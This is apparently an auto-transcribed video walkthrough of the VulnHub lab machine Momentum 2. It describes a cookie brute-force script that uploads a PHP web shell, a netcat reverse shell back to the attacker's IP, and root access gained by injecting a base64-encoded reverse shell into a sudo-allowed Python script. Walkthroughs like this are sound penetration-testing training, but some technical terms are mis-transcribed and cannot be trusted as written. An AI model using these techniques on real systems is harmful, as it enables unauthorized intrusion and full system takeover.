Yo, what's going on, guys? In this video, we're going to be doing Momentum 2 from VulnHub. This box is rated about solid easy, and yeah, hope you guys enjoy. Alright, so we'll start by splitting our terminals here. I'm going to start by writing a net discover minus r 10.0.0.1/24/i80. We do find the box with the we do find the IP of the box 10.0.0.52. So I'm going to run an mmap scan. We'll do minus sc for default scripts, minus sv for enumeration. Then we'll scan all ports on the IP. I don't want to wait for the mmap scan, so I'm going to do netcat minus nv on port 80. Does seem like port 80 is open for HTTP. Doing this, it does seem like we do get a momentum 2, so I'm going to control U to view the source code. Doesn't seem like we do have anything, so I'm going to start by doing some enumeration. We do see port 22 is open for SSH. Port 80 is open for HTTP. So I'm going to start by running a go buster. So I'm going to do go buster dir mode minus u HTTP. We'll do minus w for user share wordless. We'll do dir buster slash directory list 2.3 medium.txt. We'll do extensions as HTML, TXT, and also PHP. We do get an index.html. Image. Basically, I'm just guessing the images are just stored under images. We do have an ajax.php. Doing a little bit of enumeration, I did find out that this was a .back file. So I'm just gonna copy the URL and just wget this on my own machine. So I'm gonna Control Shift Z. I'm gonna clear the terminal. We'll wget this on our machine. I'm not sure why I didn't copy to my clipboard, but we'll wget this on my machine. We do get this right, so we'll just cat ajax.php. It does seem like we do have a cookie for admin. It does seem like the cookie is for admin, and it's adding a post under for valid, right? So looking back at this, we do have a /js. So I'm gonna go under JS. We do have main.js. Doing this, it does seem like this has to be this is a post request to ajax.php. And the response is 1 for upload success, for the file being uploaded successfully. I'm guessing for the response, if it's 0, then I'm guessing it's not gonna be the file is not going to be uploaded, right? We do have /ls, which I'm guessing is where the files are going to be uploaded. So I'm going to clear this. I'm going to vi into script.py. And we're going to start by creating a script, right? Okay, so we'll start by importing OS, and we'll import request module. So here I just want to make a script that will actually run the command for us and test for each letter, right? Because looking up here, it is telling us that we need to add one more uppercase letter at the end of the cookie. So we'll just add that, right? So we'll make a word list, which basically is going to just fuzz for this. We'll make abcs.txt. So we'll open that file. So we'll do with open. We'll do word list, which is going to be our variable. We'll try by reading this file. We'll read it as a file. We'll do words is equal to file.read. We'll do split lines. We'll start by making a for loop. So we'll do for word in words. We'll make a variable which is going to be our command. So we're going to be using curl to upload a file on here. So we'll do curl minus k minus f. We'll just name this shell.php. We'll do minus f for secure. So the secure was basically, we do have secure is equal to valid. So we'll go under F, we'll add this in quotation marks, secure is equal to valid. And under here, we're going to put our cookie. So for the cookie, we did have this right here. So let me zoom out. So for the cookie, we did have that right there. put this in quotation marks, and this is going to be plus word. And we did know that the username was admin, so I'll just put like admin is equal to, I keep zooming in for some reason. So we'll do admin is equal to the cookie, and we do have plus the word, right? Plus the word, we'll just do plus, we'll add a space in between, because we need to separate the cookie from the URL that we wanted to, where we want to upload it to. So we'll do space plus, we'll add another quotation marks here, we'll do http 10.0.052, which is ajax.php, right? So basically it's going to fuzz for the word, which is going to be under abcs.txt. We do have a space, and we do have ajax.php, right? You could also add a proxy, a minus proxy, to send this within burp. In this case, I'm not going to do that, so I'm just going to do OS system. We'll run the command. So basically it's going to run the curl command, and we'll also print out a command, right? Command. So now let's start making a for loop. So if one is basically if it's uploaded. So if one is in command, we'll print like shell is uploaded. We'll just make this like, we'll just put like plus, and we'll just do shell uploaded. So basically just gonna tell us that the shell is uploaded. We're gonna make we'll just make a for loop for execute, so we can actually keep executing the command. So we'll do for execute in command. We'll do execute underscore command is equal to, we'll make input so we can actually enter the command that we want to execute. So we'll just do so we'll do like command to execute. And basically that's where we're going to enter the command. We'll do get underscore RC. So in this case, we actually want to make a get request to the file, which is going to be like $CMD is equal to the command we want. So we just know that we want to do, we want to make a get request to the IP. So which is going to be HTTP 10.0.0.52. That's this, the files are stored under owls. We did name the file that we want to upload, which is shell.php. We'll do question mark cmd is equal to plus execute command, right? So basically it's just going to get this URL. So basically it's going to look owls shell.php question mark cmd, and it's going to execute the command that you put inside the input, right? For this, we'll print out like we want this to be in a string, so we'll just put this in like a str. Put this in a string, and we want to print out the get underscore rc dot content. Seems about right. So basically, just to make it more efficient, it doesn't let us clear, so we're just gonna add if execute underscore command is equal to, or like clear, that we can just run an OS system on our machine, right? Just to clear the terminal. We'll like clear. We'll see, we'll make an else statement. I'll just like do print. We'll do like shell not uploaded, right? So now let's review this code. So we do have wordlist.ab, or the word list is going to equal to abcs.txt. This is going to read the file. It's going to read abcs.txt. For word in words, we do have the command, which is curl minus k, and we do have f, and file is going to basically just equal to, it's supposed to be equal sign there. It's going to equal to shell.php, which is on our local machine. We'll do f. We'll name the secure is equal to valid. For the cookie, we do have admin, which is the cookie, and it's going to run a for loop till we get the right cookie, right? It's going to identify by 0 or 1. If it's 1, that means it's uploaded. If it's 0, then that means it's not uploaded, right? So do word plus, we're going to put a space in between the cookie and the URL we want to upload it to. Then we're going to upload it to ajax.php, right? So we do have OS system command. It's going to run our command. We're going to also print out the command. So we'll do if 1 is equal to command. Basically the shell, it's just letting us know the shell is uploaded. We run another for loop so we can keep executing commands on this URL, right? We print out the content. Just to make it more efficient, we did add the clear command so we can actually clear the terminal on our machine. And we can keep executing commands, right? If not, then we just put shell is not uploaded, right? So I'm gonna right quit all this. Next thing we need to do is make the our word list. We did know that it was one uppercase letter at the end of the cookie, so we'll just do the whole alphabet. So we do know that this is uppercase, so we'll do A, B, C, and we'll do each letter, right? Okay, so we do have our whole alphabet here. Now I'm going to add the quotation marks, and I'll explain to you guys why I'm doing this, right? Okay, so the reason I'm doing this is because of the Python syntax. It's not letting me write quiz, so we'll vi into script.py. So basically for the cookie, you do see that I didn't close this. Only because of the Python syntax, so I can actually make this into a whole string. So basically I'm going to add the letter plus the word, right? And then it's going to add, of course, the quotation marks to close out the cookie field right here for the curl command. So right quit, we also need to make our shell.php. So here I'm just going to cat out /opt shells. We'll do WordPress with cat shell.php. So I'm going to go into interactive mode. So we'll just name this PHP or question mark. Do question mark PHP, and we'll close this out by doing question mark PHP right there, right? So we do have that, and we do know that the parameter is going to be cmd, which is going to execute our command, right? So we'll do a chmod plus x for script. We'll do python 3 for script. Doing this, you'll see that the command was ran. Let me just run this one more time. And under here we do see a 1, which the shell was uploaded. And this seems like the right letter was R, right? And we did find the right cookie. So looking back at our owls, so we'll go to /owls. We'll go to /owls. You do see that our shell.php was uploaded, right? So now we can execute command. So we'll do id, and you do see that we are www data, right? We'll do ls, and we do have a shell. We do pwd, and we are var www html. Okay, so now since we do have our own tool now, we can start our listener up. So I'm gonna do all wrap. I'm gonna do netcat -lnvp on 9001. We'll start our, since we can execute commands now, we'll do netcat -c. We'll do netcat 10.0.069 for my IP. We'll do this on 9001, and we'll execute a/bin/bash, right? We can press enter on this. We do ID, and now we do have a better shell, right? So I'm gonna start by spawning a TTY shell. I just lost. I'm just gonna copy this one more time. So we do have a shell now. Let's copy the TTY. We'll run this in bin bash. And we'll just do this in Python 3, right? So now we do have a persistent shell. So I'm going to go to export term. Is you go to xterm. Now we can clear the terminal, right? So I'm going to go to cd/home. We'll clear this. We'll just go to team ATHENA. It does seem like we do have a password reminder, so I'm going to cat this out. It does seem like we do have a password. We do have port 22 open, so I'm going to echo out the password. So we'll just echo this on the screen. We do know that this was my vulnerable app, and plus an asterisk. An asterisk is this sign, so I'm guessing that's going to be the password. So I'm gonna SSH into 10.0.052. The Athena at 10.0.052. Press enter on that, and we do get long success, right? So I'm gonna do sudo -l. It does seem like we can run cookiegen.py. So we'll just start by looking at the code. So I'm gonna cat this out. It does seem like it just generates a random cookie. And it also does run a set process.popin. So let's actually try by getting some code execution doing this. So I'm gonna start my listener just in case. So we'll do all wrap netcat. I forgot I was in the shell. So we'll do all wrap netcat -l VP. We'll do this on 4444. So I'm just gonna go to payload all the things. We'll go to rev shell and try to like base 64 encode this. Okay, so I'm gonna cancel all of this. We'll just echo this on our terminal. We'll pipe this out to base 64. We'll change the port to 4444. And we do know that the port was, or the IP was 10.0.069, right? So let's try to do this. So we'll start by running this as root. So we'll do sudo -l. So we'll do sudo -u for the user. We'll do root and we'll run cookiegen.py. We'll try to copy this. We'll run this in, we'll echo this on the screen, and we'll pipe this out to base 64 -d, and we'll also pipe this out to like a bash. We can press enter, and doing this, we are root, so we do get a connection back. We can go into root ls, and we can cat our root.txt. Well guys, that's pretty much in the video. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.